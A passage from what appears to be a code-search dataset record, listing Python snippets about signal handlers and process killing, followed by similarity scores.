True\n time.sleep(1)\n\n # The process is 
still alive\n return False", "def kill(self, sig):\r\n now = time.time()\r\n options = self.config.options\r\n\r\n # Properly stop processes in BACKOFF state.\r\n if self.state == ProcessStates.BACKOFF:\r\n msg = (\"Attempted to kill %s, which is in BACKOFF state.\" %\r\n (self.config.name))\r\n options.logger.debug(msg)\r\n self.change_state(ProcessStates.STOPPED)\r\n return None\r\n\r\n if not self.pid:\r\n msg = (\"attempted to kill %s with sig %s but it wasn't running\" %\r\n (self.config.name, signame(sig)))\r\n options.logger.debug(msg)\r\n return msg\r\n\r\n #If we're in the stopping state, then we've already sent the stop\r\n #signal and this is the kill signal\r\n if self.state == ProcessStates.STOPPING:\r\n killasgroup = self.config.killasgroup\r\n else:\r\n killasgroup = self.config.stopasgroup\r\n\r\n as_group = \"\"\r\n if killasgroup:\r\n as_group = \"process group \"\r\n\r\n options.logger.debug('killing %s (pid %s) %swith signal %s'\r\n % (self.config.name,\r\n self.pid,\r\n as_group,\r\n signame(sig))\r\n )\r\n\r\n # RUNNING/STARTING/STOPPING -> STOPPING\r\n self.killing = 1\r\n self.delay = now + self.config.stopwaitsecs\r\n # we will already be in the STOPPING state if we're doing a\r\n # SIGKILL as a result of overrunning stopwaitsecs\r\n self._assertInState(ProcessStates.RUNNING,ProcessStates.STARTING,\r\n ProcessStates.STOPPING)\r\n self.change_state(ProcessStates.STOPPING)\r\n\r\n pid = self.pid\r\n if killasgroup:\r\n # send to the whole process group instead\r\n pid = -self.pid\r\n\r\n try:\r\n options.kill(pid, sig)\r\n except:\r\n io = StringIO()\r\n traceback.print_exc(file=io)\r\n tb = io.getvalue()\r\n msg = 'unknown problem killing %s (%s):%s' % (self.config.name,\r\n self.pid, tb)\r\n options.logger.critical(msg)\r\n self.change_state(ProcessStates.UNKNOWN)\r\n self.pid = 0\r\n self.killing = 0\r\n self.delay = 0\r\n return msg\r\n\r\n return None", "def handler(signum, frame):\n logging.warning(\"Got a {} signal. 
Doing nothing\".format(signum))", "def _on_parent_process_kill(self):", "def send(self, signal, msg=\"\"):\n self.transport.write(str(str(signal) + msg).encode())", "def restart_worker_sig_handler(signum, frame):\n worker.logger.warn(\"Restarting celeryd (%s)\" % (\n \" \".join(sys.argv)))\n worker.stop()\n os.execv(sys.executable, [sys.executable] + sys.argv)", "def signalAll(self, signal, startswithname=None):\n for name in self.processes.keys():\n if startswithname is None or name.startswith(startswithname):\n self.signalProcess(signal, name)", "def kill(self):\n self._stop_proc(signal.SIGKILL)", "def signal_handler(self, signal, frame):\r\n print 'You pressed Ctrl+C!'\r\n sys.exit(0)", "def signal_handler(signal, frame):\n sys.exit(0)", "def signal_handler(signal, frame):\n sys.exit(0)", "def signal_handler(signal, frame):\n sys.exit(0)", "def kill_all_processes(self, signal=signal.SIGINT) -> None:\n for task_name, sp in self.process_queue:\n sp.send_signal(signal)", "def kill(name, signal=9, exact=False):\n for pid in find(name, exact):\n run(\"kill -s {0} {1}\".format(signal, pid))", "def stop(self, signal):\n pass", "def stop(self, signal):\n pass", "def send(signal, sender=dispatcher.Anonymous, *args, **kwargs):\n logger.debug('Sending {} from {}'.format(signal, sender))\n return dispatcher.send(signal, sender, *args, **kwargs)", "def _send_signal(\n self,\n signal : daemoniker.DaemonikerSignal,\n timeout : Optional[Union[float, int]] = 3,\n check_timeout_interval : float = 0.1,\n ):\n import time\n daemoniker = attempt_import('daemoniker')\n\n try:\n daemoniker.send(str(self.pid_path), daemoniker.SIGINT)\n except Exception as e:\n return False, str(e)\n if timeout is None:\n return True, f\"Successfully sent '{signal}' to daemon '{self.daemon_id}'.\"\n begin = time.time()\n while (time.time() - begin) < timeout:\n if not self.pid_path.exists():\n return True, f\"Successfully stopped daemon '{self.daemon_id}'.\"\n time.sleep(check_timeout_interval)\n return False, (\n f\"Failed to stop daemon '{self.daemon_id}' within {timeout} second\"\n + ('s' if timeout != 1 else '') + '.'\n )", "def set_signal(self):\n eprint(\"Signal caught, ending log...\")\n self.log_sig = True", "def signal_handler(signal, frame):\n\n process_id = multiprocessing.current_process().name\n if process_id == 'child':\n return\n logger = logging.getlogger('signal_handler')\n logger.info('ctrl-c received.')\n logger.info('telling pipeline to shutdown')\n global pipeline\n pipeline.shutdown()", "def siginterrupt(sig, flag): # real signature unknown; restored from __doc__\n pass", "def term_mp(sig_num, frame):\n pid = os.getpid()\n pgid = os.getpgid(os.getpid())\n logger.info(\"main proc {} exit, kill process group \"\n \"{}\".format(pid, pgid))\n os.killpg(pgid, signal.SIGKILL)", "def signal_handler(*args):\n if station:\n station.shutdown()", "def Kill(self, sig, log_level, first=False):\n self._killing.set()\n self._WaitForStartup()\n if logging.getLogger().isEnabledFor(log_level):\n # Dump debug information about the hanging process.\n logging.log(log_level, 'Killing %r (sig=%r %s)', self.pid, sig,\n signals.StrSignal(sig))\n\n if first:\n ppid = str(self.pid)\n output = self._DebugRunCommand(\n ('pgrep', '-P', ppid), debug_level=log_level, print_cmd=False,\n error_code_ok=True, capture_output=True)\n for pid in [ppid] + output.splitlines():\n self._DumpDebugPid(log_level, pid)\n\n try:\n os.kill(self.pid, sig)\n except OSError as ex:\n if ex.errno != errno.ESRCH:\n raise", "def sigtrace_handler(sig,ign):\n 
global SIGNALS\n print(\"received SIG%s: %s\"%(SIGNALS[sig],process_infos(\"???\")),file=sys.stderr)\n if sig == 2:\n # Python has a special handler for SIGINT that generates\n # a KeyboardInterrupt exception\n signal.signal(sig,signal.default_int_handler)\n elif sig == signal.SIGCONT:\n # When the process restarts after being stopped we re-install\n # tracing handler on Ctrl-Z and TTIN/TTOUT signals so it is\n # possible to play with job control\n signal.signal(signal.SIGTSTP,sigtrace_handler)\n signal.signal(signal.SIGTTOU,sigtrace_handler)\n signal.signal(signal.SIGTTIN,sigtrace_handler)\n else:\n # Once a signal has been received we reinstall the default\n # handler before self-resending the signal\n signal.signal(sig,signal.SIG_DFL)\n # All signal received but SIGCONT are self-resent after being received\n if sig != signal.SIGCONT:\n os.kill(os.getpid(),sig)", "def _on_event(self, event) -> None:\n self.signal.emit(event)", "def signal_handler(signum, frame):\n monitor.stop()\n sys.exit(0)", "def kill(self):\n\n self.proc.kill()", "def try_kill(pid, sig):\n try:\n os.kill(int(pid), sig)\n except OSError:\n pass", "def requeueHandler(self, signum, frame):\n args = self.args\n print('Signal received', signum, time.time(), flush=True)\n self.SIGNAL_RECEIVED = True\n\n if os.path.isfile(self.HALT_filename):\n print('Job is done, exiting', flush=True)\n exit(0)", "def signal_handler(signal_received, frame):\n\n sys.stdout.write('\\n')\n sys.exit(0)", "def handle_signal(sig, frame):\n IOLoop.instance().add_callback(IOLoop.instance().stop)", "def sigint_handler(signal, frame):\n rclpy.shutdown()\n if prev_sigint_handler is not None:\n prev_sigint_handler(signal)", "def signal_ready(self):\n self._container.kill(signal.SIGUSR1)", "def register_signal_handler(self):\n signal.signal(signal.SIGINT, self.quit_gracefully)\n signal.signal(signal.SIGTERM, self.quit_gracefully)\n return", "def shutdownSignal(signum, frame):\n LOG.warning(\"shutting down, got signal %d\", signum)\n shutdown()", "def _kill_self():\n os.kill(os.getpid(), signal.SIGKILL)", "def process_signal(self, src, tag, value):\n pass", "def signal_handler(signal, frame):\n print(chr(27) + \"[2J\")\n sys.exit(0)", "def signal(signal=None):\n no_extra_args = (\"configtest\", \"status\", \"fullstatus\")\n valid_signals = (\"start\", \"stop\", \"restart\", \"graceful\", \"graceful-stop\")\n\n if signal not in valid_signals and signal not in no_extra_args:\n return\n # Make sure you use the right arguments\n if signal in valid_signals:\n arguments = \" -k {}\".format(signal)\n else:\n arguments = \" {}\".format(signal)\n cmd = _detect_os() + arguments\n out = __salt__[\"cmd.run_all\"](cmd)\n\n # A non-zero return code means fail\n if out[\"retcode\"] and out[\"stderr\"]:\n ret = out[\"stderr\"].strip()\n # 'apachectl configtest' returns 'Syntax OK' to stderr\n elif out[\"stderr\"]:\n ret = out[\"stderr\"].strip()\n elif out[\"stdout\"]:\n ret = out[\"stdout\"].strip()\n # No output for something like: apachectl graceful\n else:\n ret = 'Command: \"{}\" completed successfully!'.format(cmd)\n return ret", "def kill(self):\n if self.transport.pid is not None:\n self.transport.signalProcess('KILL')", "def _send_kernel_sigterm(self, restart: bool = False):", "def signal_kernel(self, signum):\n pass", "def remote_kill():", "def _terminate(self):\n\n stopsignal = self.stopsignal\n\n log.info('Stop Process Requested')\n self._terminating = True\n if self._p0:\n log.info('Sending signal %s to process %s' % (stopsignal, self._p0.pid))\n 
kill_tree(self._p0.pid, stopsignal)\n elif self._p0 is None:\n raise errors.ChalmersError(\"This process did not start this program, can not call _terminate\")", "def trigger_signal(self, signal: str) -> None:\n logger.debug(\"Triggered Signal %s\", signal)\n for handler in self.signals[signal]:\n if not iscoroutinefunction(handler):\n handler(self, signal)", "def signal_handler(signal, frame): \n import signal\n import sys\n from time import localtime, strftime\n time = strftime(\"%H:%M:%S\", localtime())\n sel = raw_input('\\n\\n%s: Paused. Press return to resume, or type exit to quit: \\n' % time)\n if sel.startswith('e') or sel.startswith('E'):\n sys.exit(0)\n else:\n time = strftime(\"%H:%M:%S\", localtime())\n print '%s: Interrogation resumed.\\n' % time", "def kill(self, signum, frame):\n self.delete()\n os.kill(os.getpid(), signum)", "def signal_handler(signum, frame):\n self.log.error(\"Received SIGTERM. Terminating subprocesses\")\n self.task_runner.terminate()\n self.handle_task_exit(128 + signum)" ]
[ "0.83821654", "0.82537395", "0.78793293", "0.7300469", "0.7116897", "0.7112409", "0.7100441", "0.7099212", "0.68905115", "0.6861185", "0.6853869", "0.68038225", "0.67226195", "0.6577294", "0.65427446", "0.65303904", "0.6520947", "0.64594877", "0.6416063", "0.6404712", "0.6392736", "0.6364421", "0.63409144", "0.63300043", "0.63141257", "0.6277827", "0.6277251", "0.62402284", "0.62154114", "0.62071717", "0.6193959", "0.6121365", "0.611319", "0.61062926", "0.60988635", "0.60839367", "0.6076719", "0.60598505", "0.60475475", "0.6026432", "0.602507", "0.6007628", "0.59988976", "0.5996111", "0.5970812", "0.5970638", "0.59554684", "0.59505063", "0.5934748", "0.5928679", "0.5918275", "0.5911693", "0.5889584", "0.5871705", "0.58663654", "0.58578956", "0.5856859", "0.58506244", "0.5849709", "0.584507", "0.58415157", "0.58415157", "0.58415157", "0.5830738", "0.5823205", "0.5803624", "0.5803624", "0.5795123", "0.579459", "0.57847315", "0.5778715", "0.5771168", "0.5764006", "0.57623404", "0.57548654", "0.5753262", "0.57357234", "0.5733585", "0.57324994", "0.5728182", "0.57277614", "0.57259744", "0.57198834", "0.57134295", "0.57078564", "0.5704503", "0.56983376", "0.5690706", "0.56760305", "0.5664787", "0.565714", "0.5644327", "0.56311524", "0.5617244", "0.56076384", "0.55979466", "0.5582453", "0.5578827", "0.55751824", "0.5567608" ]
0.7512397
3
Update self.boxes with the new frame's boxes
def update(self, new_boxes):
    if len(self.lengths) > self.n_frames:
        # delete oldest if exceed capacity
        del self.boxes[0:self.lengths[0]]
        del self.lengths[0]
    self.lengths.append(len(new_boxes))
    self.boxes.extend(new_boxes)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def changement_frame(self):\n\n for widget in self.fenetre_scores.winfo_children():\n widget.pack_forget()\n\n for widget in self.fenetre_regles.winfo_children():\n widget.pack_forget()\n\n for widget in self.frame_jeu.winfo_children():\n widget.pack_forget()\n\n for widget in self.winfo_children():\n if widget != self.titre:\n widget.pack_forget()", "def Define_Frame(self):\n self.frame=Frame(self.master, relief=GROOVE, bd=4)\n self.frame.grid(row=0,column=1,rowspan=2,columnspan=2)\n frame_title = Label(self.frame,text=\"Stage Control\",relief=RAISED,bd=2,width=24, bg=\"light yellow\",font=(\"Times\", 16))\n frame_title.grid(row=0, column=1)\n self.encoder_text = [] # These hold the stage position as read by the encoders\n self.coo_ent = [] # These hold the coordinate entry values\n but = []\n encoder_display = []\n for i in range(3):\n self.coo_ent.append(Entry(self.frame, justify=\"center\", width=12))\n but.append(Button(self.frame, text=\"Move %s (relative)\"%self.POS_NAME[i], width=12,command=lambda axis=i:self.GUI_move(axis)))\n self.encoder_text.append(StringVar())\n encoder_display.append(Label(self.frame,textvariable=self.encoder_text[i],relief=SUNKEN,bd=1, width=20))\n self.coo_ent[i].grid(row=i+1,column=0)\n self.coo_ent[i].focus_set()\n but[i].grid(row=i+1,column=1)\n encoder_display[i].grid(row=i+1,column=2)\n self.encoder_text[i].set(\"%8s microns\"%str(self.read_pos[i]))\n zero_encoders_button = Button(self.frame, text=\"Re-Initialize Encoders\", width=20, command=self.GUI_ReInitialize_Encoders)\n zero_encoders_button.grid(row=5,column=1)\n return", "def setUpFrame(self):\n #adds labels to the Board\n self.mineLabel = tk.Label(self, text=\"Mines: \"+str(self.numMines))\n self.mineLabel.grid(row=0, column=0, sticky=\"W\", columnspan=int((self.cols-2)/2))\n self.smileButton = tk.Label(self, image=self.images[1])\n self.smileButton.grid(row=0, column=int((self.cols-2)/2), sticky=\"WE\", columnspan=2)\n self.flagLabel = tk.Label(self, text=\"Flags: \"+str(self.numFlags))\n self.flagLabel.grid(row=0, column=int((self.cols-2)/2)+2, sticky=\"E\", columnspan=int((self.cols-1)/2))\n\n #left click listeners on smileButton\n self.smileButton.bind('<ButtonPress-1>', lambda event, num=0: self.changeSmile(num))\n self.smileButton.bind('<ButtonRelease-1>', self.replay)", "def createFrame(self):\n \n self.outerFrame = f = Tk.Frame(self.frame)\n f.pack(expand=1,fill=\"both\")\n \n if self.label:\n labf = Tk.Frame(f)\n labf.pack(pady=2)\n lab = Tk.Label(labf,text=self.label)\n lab.pack()\n \n f2 = Tk.Frame(f)\n f2.pack(expand=1,fill=\"both\")\n \n self.box = box = Tk.Listbox(f2,height=20,width=30)\n box.pack(side=\"left\",expand=1,fill=\"both\")\n \n bar = Tk.Scrollbar(f2)\n bar.pack(side=\"left\", fill=\"y\")\n \n bar.config(command=box.yview)\n box.config(yscrollcommand=bar.set)", "def updatemaxbombs(self):\n tiles: int = int(self.widthbox.get()) * int(self.heightbox.get())\n self.bombsbox.configure(to=tiles/2)", "def _set_boxes(self, listOfBoxes):\n self._boxes = listOfBoxes", "def extra_frame(self):\n\n self.extraframe = tk.Frame(self.extra_notebook, bg='white')\n self.extraframe.pack(anchor='center', expand=True, fill='y')\n # RoHS checker\n self.rohsframe = tk.Frame(self.extraframe, bg='#7093db')\n self.rohsframe.pack(pady=10, fill='x', expand=True)\n rohs = DoubleTextButton(self.rohsframe,\n text_main='RoHS Bill of Materials Comparison',\n text_sub='Output a delta report between two BOMS',\n command=lambda: self.raiseframe_extra(ROHSCompare))\n rohs.pack(fill='x', expand=True, 
side='right', padx=(4, 0))\n # Format Checker\n self.filterframe = tk.Frame(self.extraframe, bg='#7093db')\n self.filterframe.pack(pady=10, fill='x', expand=True)\n filtercheck = DoubleTextButton(self.filterframe,\n text_main='Format Checker',\n text_sub='Will output filtered CCL to check CCL format',\n command=lambda: self.raiseframe_extra(FilterCompare))\n filtercheck.pack(fill='x', expand=True, side='right', padx=(4, 0))\n # Illustration tool\n self.illtoolframe = tk.Frame(self.extraframe, bg='#7093db')\n self.illtoolframe.pack(pady=10, fill='x', expand=True)\n illustration_tool = DoubleTextButton(self.illtoolframe,\n text_main='Illustration Tool',\n text_sub='Used to insert and delete illustrations',\n command=lambda: self.raiseframe_extra(InsertDelIllustration))\n illustration_tool.pack(fill='x', expand=True, side='right', padx=(4, 0))", "def fillbox(self,event=None):\n \n pass", "def build_frames(self):\n self.cntrl_frame = tk.PanedWindow(self.root)\n self.cntrl_frame.pack(side = tk.TOP, padx = 1, pady = 1, fill = tk.Y)\n self.info_frame_1 = tk.PanedWindow(self.root)\n self.info_frame_1.pack(side = tk.TOP, padx = 1, pady = 2, fill = tk.Y)", "def _bbox_updated(self):\n self.updated = True", "def updateFootprintBbox(self):\n # Pull out the image bounds of the parent Footprint\n self.bb = self.fp.getBBox()\n if not self.imbb.contains(self.bb):\n raise ValueError(('Footprint bounding-box %s extends outside image bounding-box %s') %\n (str(self.bb), str(self.imbb)))\n self.W, self.H = self.bb.getWidth(), self.bb.getHeight()\n self.x0, self.y0 = self.bb.getMinX(), self.bb.getMinY()\n self.x1, self.y1 = self.bb.getMaxX(), self.bb.getMaxY()", "def update(self):\n self.active = False\n self.top.update(self.rgb,self.cmyk,self.hsv)\n self.bot.update(self.rgb,self.cmyk,self.hsv)\n self.active = True", "def refreshActiveFrames(self, event=None):\n self.unloadAllFrames()\n self.checkFramesHaveData()\n\n try:\n self.contentFrame.currFrame.built = False\n except AttributeError:\n pass\n\n try:\n if self.contentFrame.currFrame.hasRequiredData():\n self.contentFrame.currFrame.enter()\n else:\n self.frameBtnCmds[0](self)\n except AttributeError:\n self.frameBtnCmds[0](self)", "def load(self):\n # Frame\n self.frame.grid_configure(row=1, column=1, padx=(PAD, PAD+TINY_PAD), pady=(0, PAD+CANVAS_PAD), sticky=tk.N+tk.S)\n self.frame.rowconfigure(1, weight=1)\n self.frame.rowconfigure(3, weight=1)\n # Across label\n self.across_label.config(text=\"Across\", anchor=tk.W, **settings.get(\"style:clue\"))\n self.across_label.grid(row=0, column=0, pady=(0, TINY_PAD), sticky=tk.N+tk.W)\n # Across frame\n self.across_frame.config(highlightthickness=1, highlightbackground=settings.get(\"style:border:fill\"))\n self.across_frame.grid(row=1, pady=(CANVAS_PAD, PAD), sticky=tk.N+tk.S)\n self.across_frame.rowconfigure(0, weight=1)\n # Across listbox\n self.across_listbox.config(bd=0, selectborderwidth=0, activestyle=tk.NONE, **settings.get(\"style:list\"))\n self.across_listbox.grid(row=0, column=0, sticky=tk.N+tk.S)\n self.across_listbox.config(yscrollcommand=self.across_scrollbar.set)\n # Across scrollbar\n self.across_scrollbar.config(command=self.across_listbox.yview)\n self.across_scrollbar.grid(row=0, column=1, sticky=tk.N+tk.S)\n # Down label\n self.down_label.config(text=\"Down\", anchor=tk.W, **settings.get(\"style:clue\"))\n self.down_label.grid(row=2, column=0, pady=(PAD, 0), sticky=tk.N+tk.W)\n # Down frame\n self.down_frame.config(highlightthickness=1, 
highlightbackground=settings.get(\"style:border:fill\"))\n self.down_frame.grid(row=3, pady=(TINY_PAD, 0), sticky=tk.N+tk.S)\n self.down_frame.rowconfigure(0, weight=1)\n # Down listbox\n self.down_listbox.config(bd=0, selectborderwidth=0, activestyle=tk.NONE, **settings.get(\"style:list\"))\n self.down_listbox.grid(row=0, column=0, sticky=tk.N+tk.S)\n self.down_listbox.config(yscrollcommand=self.down_scrollbar.set)\n # Down scrollbar\n self.down_scrollbar.config(command=self.down_listbox.yview)\n self.down_scrollbar.grid(row=0, column=1, sticky=tk.N+tk.S)", "def create_frames(self):\n self.list_frame = Frame(self.master)\n self.list_frame.grid(row=0, column=0)\n\n self.volume_frame = VolumeFrame(master=self.master, text=\"Volume\")\n self.volume_frame.grid(row=0, column=2, rowspan=2)\n\n self.btn_frame = Frame(self.master)\n self.btn_frame.grid(row=1, column=0, padx=20)\n\n self.listbox = Listbox(self.list_frame, bg='black', fg='green', selectbackground='gray', selectforeground='black', selectmode=EXTENDED, width=48)\n self.listbox.pack(fill=X, padx=20, pady=(20, 0))\n self.slider = ttk.Scale(self.list_frame, value=0, from_=0, to=100, orient=HORIZONTAL, command=self.slide)\n self.slider.pack(fill=X, padx=20)\n\n # setting images\n global img_1, img_2, img_3, img_4, img_5\n img_1 = ImageConverter.create_image(f'img/next.png', 40, 180)\n img_2 = ImageConverter.create_image(f'img/play.png', 40, 0)\n img_3 = ImageConverter.create_image(f'img/pause.png', 40, 0)\n img_4 = ImageConverter.create_image(f'img/stop.png', 40, 0)\n img_5 = ImageConverter.create_image(f'img/next.png', 40, 0)\n\n images = [{\"file\": img_1, \"command\": self.previous},\n {\"file\": img_2, \"command\": self.play},\n {\"file\": img_3, \"command\": self.pause},\n {\"file\": img_4, \"command\": self.stop},\n {\"file\": img_5, \"command\": self.next}]\n\n for index, image in enumerate(images):\n self.btn = Button(self.btn_frame, image=image[\"file\"], command=image[\"command\"], relief=FLAT)\n self.btn.grid(row=0, column=index, sticky=N+S+E+W, padx=8)\n\n self.info_frame = Frame(self.master)\n self.info_frame.grid(row=2, column=0, sticky=S)\n self.info_label = Label(self.info_frame, text=\"\", relief=SUNKEN, anchor=E, width=48)\n self.info_label.pack(fill=X)", "def update_window(self, window, frame):\n self.draw_eyes()\n self.show(window, frame)\n self.new_frame()", "def __init__(self, box):\n self.is_hidden = False\n self.last_boxes = []\n self.best_box = None\n self.frames_undetected = 0\n self.age = 0\n self.n_frames = 10\n\n self.update(box)", "def __update(self):\n for b in self.__borders:\n b.redraw()\n\n for w in self.__allWins:\n w.refresh()", "def updateBlobs(self):\n with signalsBlocked(self.param):\n # with signalsBlocked(self.param):\n inputs = self.inputs()\n self.bottoms.setValue([i.name() for i in inputs.values()], clear=True)\n outputs = self.outputs()\n self.tops.setValue([o.name() for o in outputs.values()], clear=True)\n self.updateProto()", "def _create_left_summary_frame(self):\n self.frames.append(tk.Frame(self.master))\n self.frames[6].grid(column=0, row=2, sticky=\"ew\")\n self.getall_button = (tk.Button(self.frames[6],\n text=\"All Indiv stats\"))\n self.getall_button.grid(column=0, row=0, sticky=\"nesw\")\n self.go_button = (tk.Button(self.frames[6], text=\"Team Stats\"))\n self.go_button.grid(column=1, row=0, sticky=\"nesw\")\n self.frames[6].columnconfigure(0, weight=1)\n self.frames[6].columnconfigure(1, weight=1)", "def UpdateFrame(self, sender=None, args=None):\n # Update label for sensor: 
s['label']\n # with the most recent measurement: s().data['data'][-1]\n for s in self.sensors:\n self.gValue[s.GetID()].SetLabel( '{num} {unit}'.format(\n num = s().data['data'][-1],\n unit = str(s['unit'])) )\n try:\n pub.sendMessage( 'Plot.%s' %self.GetLabel() )\n except:\n self.plot_deleted = True\n\n \n self.top_sizer.Layout()", "def update(self):\n left_height = self.left.height if self.left else -1\n right_height = self.right.height if self.right else -1\n self.height = 1 + max(left_height, right_height)\n self.bf = right_height - left_height", "def _initialize_widgets(self):\n self.outer_board = [[Frame(self.root, bd = self.FRAME_BORDER_WIDTH, \n relief = self.FRAME_RELIEF) \n for _ in range(self.BOARD_DIM)] \n for _ in range(self.BOARD_DIM)]\n self.inner_boards = [[self._generate_inner_board(r, c) \n for c in range(self.BOARD_DIM)]\n for r in range(self.BOARD_DIM)]", "def _refresh_screen(self):\n self.myscreen.refresh()\n self.box1.refresh()\n self.box2.refresh()", "def update_bbox(self): \r\n \r\n centX, centY = self.center\r\n\r\n brush_thickness = self.brush[0]\r\n\r\n margin = self.__size + brush_thickness + BOUNDARY_MARGIN\r\n\r\n self.bbox = [int(centX - margin), int(centY - margin),\r\n int(centX + margin), int(centY + margin)]", "def update_(self):\n self.update_listbox()\n self.update_infobox()\n self.update_statusbar()\n self.listbox.select_set(0)\n self.listbox.focus_set()", "def main():\n global fenetre, gr_grid,grid, chaine, var1, var2\n fenetre = Frame()\n \n fenetre.grid()\n fenetre.master.title('2048')\n var1= StringVar()\n var2= StringVar()\n Checkbutton(fenetre, text=\"Entier\", width= 11, variable= var1, onvalue='oui', offvalue='non').grid(row=1, sticky=E)\n Checkbutton(fenetre, text=\"Chimie\", width= 10, variable= var2, onvalue='oui', offvalue='non').grid(row=1, sticky=W)\n \n but1=Button(fenetre, text='Load', width= 11, command=grid_load1)\n but1.grid(row= 2, sticky= W)\n but2=Button(fenetre, text='Save', width= 11, command=grid_save1)\n but2.grid(row=2, sticky= E)\n fenetre.master.bind(\"<Key>\", key_pressed)\n background = Frame(fenetre, bg = GAME_BG,\n width=GAME_SIZE, height=GAME_SIZE)\n background.grid()\n chaine= Label(fenetre)\n chaine.grid()\n gr_grid = []\n for i in range(4):\n gr_line = []\n for j in range(4):\n cell = Frame(background, bg = TILE_EMPTY_BG,\n width = TILES_SIZE, height = TILES_SIZE)\n cell.grid(row=i, column=j,padx=1, pady=1)\n t = Label(master = cell, text = \"\", bg = TILE_EMPTY_BG,\n justify = CENTER, font = TILES_FONT,\n width=4, height=2)\n t.grid()\n gr_line.append(t)\n gr_grid.append(gr_line)\n grid = grid_init()\n grid_display(grid)\n fenetre.mainloop()", "def createFrame(self):\n \n tkinterListBoxDialog.createFrame(self)\n self.addFrameButtons()", "def refresh(self):\n\t\tself.win.refresh()\n\t\tfor c in self.components:\n\t\t\tc.refresh()", "def create_status_robot_frame(self):\n\n self.Robot_Status_Frame = tk.Frame(master=self)\n self.Robot_Status_Frame.config(highlightthickness=1, highlightcolor=\"black\", highlightbackground=\"black\")\n self.Robot_Status_Frame.pack(side = tk.LEFT, padx = 20, pady = 10, fill = tk.BOTH)\n\n status_lbl = tk.Label(master = self.Robot_Status_Frame, text = \"ROBOT STATUS\", width = 15)\n status_lbl.pack(side = tk.TOP) \n\n self.lbl_pose_x = tk.StringVar()\n self.lbl_pose_y = tk.StringVar()\n self.lbl_angle = tk.StringVar()\n self.lbl_status = tk.StringVar()\n self.lbl_goto_x = tk.StringVar()\n self.lbl_goto_y = tk.StringVar()\n\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, 
label_text = \"X: \", label_target = self.lbl_pose_x)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"Y: \", label_target = self.lbl_pose_y)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"Angle: \", label_target = self.lbl_angle)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"Status: \", label_target = self.lbl_status)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"\", label_target = None)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"next GOTO X: \", label_target = self.lbl_goto_x)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"next GOTO Y: \", label_target = self.lbl_goto_y)\n\n\n self.lbl_pose_x.set(\"N/A\")\n self.lbl_pose_y.set(\"N/A\")\n self.lbl_angle.set(\"N/A\")\n self.lbl_status.set(\"N/A\")\n self.lbl_goto_x.set(\"N/A\")\n self.lbl_goto_y.set(\"N/A\")", "def onFrameUpdated(self):\n pass", "def build_frames(dialbox):\n #Buttons Frame\n dialbox.button_frame = tk.Frame(dialbox.master_frame)\n dialbox.button_frame.grid(row=3, column=1)\n #Output Frame\n dialbox.output_frame = tk.Frame(dialbox.master_frame)\n dialbox.output_frame.grid(row=4, column=0, columnspan=2)", "def updateButtons(self):\n self.cboxes = [] # List of check boxes\n self.tboxes = [] # Corresponding list of text boxes\n for r in range(self.nclasses):\n c = 0\n # print('**', self.clusters[r])\n tbox = QLineEdit(self.clusters[r])\n tbox.setMinimumWidth(80)\n tbox.setMaximumHeight(150)\n tbox.setStyleSheet(\"border: none;\")\n tbox.setAlignment(Qt.AlignCenter)\n tbox.textChanged.connect(self.updateClusterNames)\n self.tboxes.append(tbox)\n self.flowLayout.addWidget(self.tboxes[-1], r, c)\n c += 1\n cbox = QCheckBox(\"\")\n cbox.clicked.connect(self.selectAll)\n self.cboxes.append(cbox)\n self.flowLayout.addWidget(self.cboxes[-1], r, c)\n c += 1\n # Find the segments under this class and show them\n for segix in range(len(self.segments)):\n if self.segments[segix][-1] == r:\n self.flowLayout.addWidget(self.picbuttons[segix], r, c)\n c += 1\n self.picbuttons[segix].show()\n self.flowLayout.adjustSize()\n self.flowLayout.update()\n self.setColourLevels()", "def update(self):\n self.rect = (self.x, self.y, self.width, self.height)", "def build_boxes(self):\n for index in self.box_space.points:\n if self.rank_of_box[index] == self.my_rank:\n self.my_boxes.append(Box(self, index))", "def update_selection(self):\n\n # clear all boxes\n self.clear_boxes()\n self.draw_figure(self.s)\n\n # update temperature list\n if self.Data[self.s]['T_or_MW'] == \"T\":\n self.temperatures = np.array(self.Data[self.s]['t_Arai']) - 273.\n else:\n self.temperatures = np.array(self.Data[self.s]['t_Arai'])\n\n self.T_list = [\"%.0f\" % T for T in self.temperatures]\n self.tmin_box.SetItems(self.T_list)\n self.tmax_box.SetItems(self.T_list)\n self.tmin_box.SetValue(\"\")\n self.tmax_box.SetValue(\"\")\n self.Blab_window.SetValue(\n \"%.0f\" % (float(self.Data[self.s]['pars']['lab_dc_field']) * 1e6))\n if \"saved\" in self.Data[self.s]['pars']:\n self.pars = self.Data[self.s]['pars']\n self.update_GUI_with_new_interpretation()\n self.Add_text(self.s)\n self.write_sample_box()", "def addFrameButtons (self):\n \n self.buttonFrame = f = Tk.Frame(self.outerFrame)\n f.pack()\n \n row1 = Tk.Frame(f)\n row1.pack()\n \n # Create the back and forward buttons, cloning the images & commands of the already existing buttons.\n image = 
self.lt_nav_iconFrame_button.cget(\"image\")\n command = self.lt_nav_iconFrame_button.cget(\"command\")\n \n self.lt_nav_button = b = Tk.Button(row1,image=image,command=command)\n b.pack(side=\"left\",pady=2,padx=5)\n \n image = self.rt_nav_iconFrame_button.cget(\"image\")\n command = self.rt_nav_iconFrame_button.cget(\"command\")\n \n self.rt_nav_button = b = Tk.Button(row1,image=image,command=command)\n b.pack(side=\"left\",pady=2,padx=5)\n \n row2 = Tk.Frame(f)\n row2.pack()\n self.addStdButtons(row2)\n \n row3 = Tk.Frame(f)\n row3.pack()\n \n self.clear_button = b = Tk.Button(row3,text=\"Clear All\",\n width=6,command=self.clearAll)\n b.pack(side=\"left\",pady=2,padx=5)\n \n self.delete_button = b = Tk.Button(row3,text=\"Delete\",\n width=6,command=self.deleteEntry)\n b.pack(side=\"left\",pady=2,padx=5)", "def updateBox(self):\n for k in vars(self.ml_classifier_cls):\n if (not k.startswith('__')) and k != 'status' and k != 'model':\n value = getattr(self.ml_classifier_cls, k)\n self.parameters[k] = value\n\n rows = [widgets.HTML(value='<h3>Configure your backend machine learning model</h3>'\n '<p>If you are not sure what 